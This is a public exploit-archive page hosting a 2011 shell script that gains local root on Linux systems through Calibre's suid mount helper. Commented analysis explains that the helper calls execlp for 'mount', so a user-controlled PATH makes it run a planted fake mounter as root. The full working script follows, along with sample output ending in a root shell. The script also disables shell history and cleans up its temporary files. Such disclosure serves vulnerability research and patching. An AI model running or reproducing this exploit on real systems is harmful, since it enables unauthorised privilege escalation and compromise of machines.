exploit the possibilities

Calibre E-Book Reader Local Root

Calibre E-Book Reader Local Root
Posted Nov 2, 2011
Authored by zx2c4

Calibre E-Book Reader local root exploit that leverages PATH manipulation and a suid mount helper.

tags | exploit, local, root
MD5 | 5856dee869f4b3b8329ee45b64343177

Calibre E-Book Reader Local Root

Change Mirror Download
#!/bin/sh

#######################################
# .50-Calibrer Assault Mount #
# by zx2c4 #
#######################################

################################################################################
# Calibre uses a suid mount helper, and like nearly all suid mount helpers that
# have come before it, it's badly broken. Let's go through Calibre's faulty code
# available at http://pastebin.com/auz9SULi and look at the array of silly
# things done, only one of which we actually need to get root.
#
# In this spot here, we can create a directory owned by root anywhere we want:
#
# 47 if (!exists(mp)) {
# 48 if (mkdir(mp, S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH) != 0) {
# 49 errsv = errno;
# 50 fprintf(stderr, "Failed to create mount point with error: %s\n", strerror(errsv));
# 51 }
# 52 }
#
# At this point, we can remove any empty directory we want:
#
# 172 rmd = rmdir(mp);
#
# And elsewhere, we can create and remove anything_we_want/.some_stupid_marker.
# I'm sure you can figure out how to exploit these kinds of things :-P.
#
# We also get the ability with this wonderful mount-helper to unmount and eject
# any device that we want (as root), as well as mount any vfat filesystem that
# we'd like.
#
# Not only that, but we can pass params directly to mount, to some degree:
#
# 83 execlp("mount", "mount", "-t", "auto", "-o", options, dev, mp, NULL);
#
# On this line, "dev" and "mp" are controlled by argv[2] and argv[3]. I'm sure
# you can find fun things to do with this as well. (There -s and also the man
# pages say the last -o is respected, etc etc. Be creative.)
#
# But there's also something lurking that is way worse in this line. Is that
# "execlp" we see? Yes. According to the man pages:
#
# The execlp(), execvp(), and execvpe() functions duplicate the actions of
# the shell in searching for an executable file if the specified
# filename does not contain a slash (/) character.
#
# execlp searchs PATH for where to find "mount", and then runs it as root. And,
# with great joy, we find that we can trivially control PATH by setting it
# before running the mount helper. So the attack plan is simple:
#
# 1. Make an executable named "mount" in the current directory that executes
# a shell.
# 2. PATH=".:$PATH" calibre-mount-helper mount something somethingelse
#
# And that's it! We have root. The below exploit creates things in a temporary
# directory that gets cleaned up and displays some status information along the
# way.
#
# - zx2c4
# 2011-11-1
#
# Usage:
# $ ./50calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.q5ktd8UcxP
# [+] Making mount point.
# [+] Writing malicious mounter.
# [+] Overriding PATH and getting root.
# [+] Cleaning up: /tmp/tmp.q5ktd8UcxP
# [+] Checking root: uid=0(root) gid=0(root) groups=0(root)
# [+] Launching shell.
# sh-4.2#
#
################################################################################


set -e
echo "#######################################"
echo "# .50-Calibrer Assault Mount #"
echo "# by zx2c4 #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making mount point."
mkdir mountpoint
echo "[+] Writing malicious mounter."
cat > mount <<END
#!/bin/sh
cd /
echo "[+] Cleaning up: $dir"
rm -rf "$dir"
echo -n "[+] Checking root: "
id
echo "[+] Launching shell."
HISTFILE="/dev/null" exec /bin/sh
END
chmod +x mount
echo "[+] Overriding PATH and getting root."
PATH=".:$PATH" calibre-mount-helper mount /dev/null mountpoint

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    2 Files
  • 23
    Jun 23rd
    1 Files
  • 24
    Jun 24th
    23 Files
  • 25
    Jun 25th
    19 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close